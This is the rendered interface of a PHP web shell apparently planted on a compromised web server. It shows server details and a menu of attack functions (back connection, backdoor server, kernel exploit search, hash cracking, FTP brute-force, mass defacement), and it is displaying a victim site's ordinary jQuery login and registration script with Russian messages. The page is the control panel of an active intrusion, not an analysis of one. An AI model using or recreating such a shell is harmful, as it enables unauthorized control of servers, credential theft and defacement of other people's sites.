IP Address: 80.252.133.24:443 You: 216.73.216.93
| |||||||||||||||||||
|
| ||||||||||||||||||
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
| |||||||||||||||||||
/ home/ yalagina/ map/ site/ scripts/ - drwxr-sr-x |
Viewing file:
Select action/file-type: function login() { jQuery.ajax({ url: 'login.php', type: 'POST', data: jQuery('#logform').serialize(), success: function( data ) { if( data.match( /\<ok\/\>/ ) ) { var text = "Вход выполнен успешно"; jQuery("#report").addClass("success_text"); var islogin = true; } else { var text = "Неверные логин/пароль"; jQuery("#report").addClass("error_text"); } function slide_w() { jQuery("#report").slideUp("slow"); } jQuery("#report").text(text); jQuery("#report").slideDown("slow"); setTimeout(slide_w, 2000); if(islogin) { function toog_at() { document.location.reload(); } setTimeout(toog_at, 2000); } } }); } function add() { jQuery.ajax({ url: 'index.php', type: 'POST', data: jQuery('#addform').serialize(), success: function( data ) { if( data.match( /\<ok\/\>/ ) ) { var strtext = "Успешно добавлено!"; jQuery("#report").addClass("success_text"); var temp = 1; } else if( data.match( /\<bad1\/\>/ ) ) { jQuery("#report").addClass("error_text"); var strtext = "Заполните все поля!"; } else if( data.match( /\<bad2\/\>/ ) ) { jQuery("#report").addClass("error_text"); var strtext = "Пароли не совпадают!"; } else if( data.match( /\<bad3\/\>/ ) ) { jQuery("#report").addClass("error_text"); var strtext = "Логин уже занят!"; } else if( data.match( /\<bad4\/\>/ ) ) { jQuery("#report").addClass("error_text"); var strtext = "Небезопасный пароль!"; } else if( data.match( /\<bad5\/\>/ ) ) { jQuery("#report").addClass("error_text"); var strtext = "Некорректный email!"; } else if( data.match( /\<bad6\/\>/ ) ) { jQuery("#report").addClass("error_text"); var strtext = "Некорректный логин!"; } else if( data.match( /\<bad7\/\>/ ) ) { jQuery("#report").addClass("error_text"); var strtext = "Неверный код безопасности!"; } function slide_w() { jQuery("#report").slideUp("slow"); } jQuery("#report").text(strtext); jQuery("#report").slideDown("slow"); setTimeout(slide_w, 2000); if(temp == 1) { function closeAdd() { jQuery("#add_user").togglePopup(); } setTimeout(closeAdd, 2000); } } }); } function logout() { jQuery.ajax({ url: 'logout.php', type: 'POST', data: 'logout', success: function( data ) { if(data.match( /\<ok\/\>/ )) { document.location.reload(); } else { alert('is bed'); } } }); } |
Command: | |
Quick Commands: | |
Upload: | |
PHP Filesystem: |
<@ |
Search File: | |
Create File: | |
View File: | |
Mass Defacement: |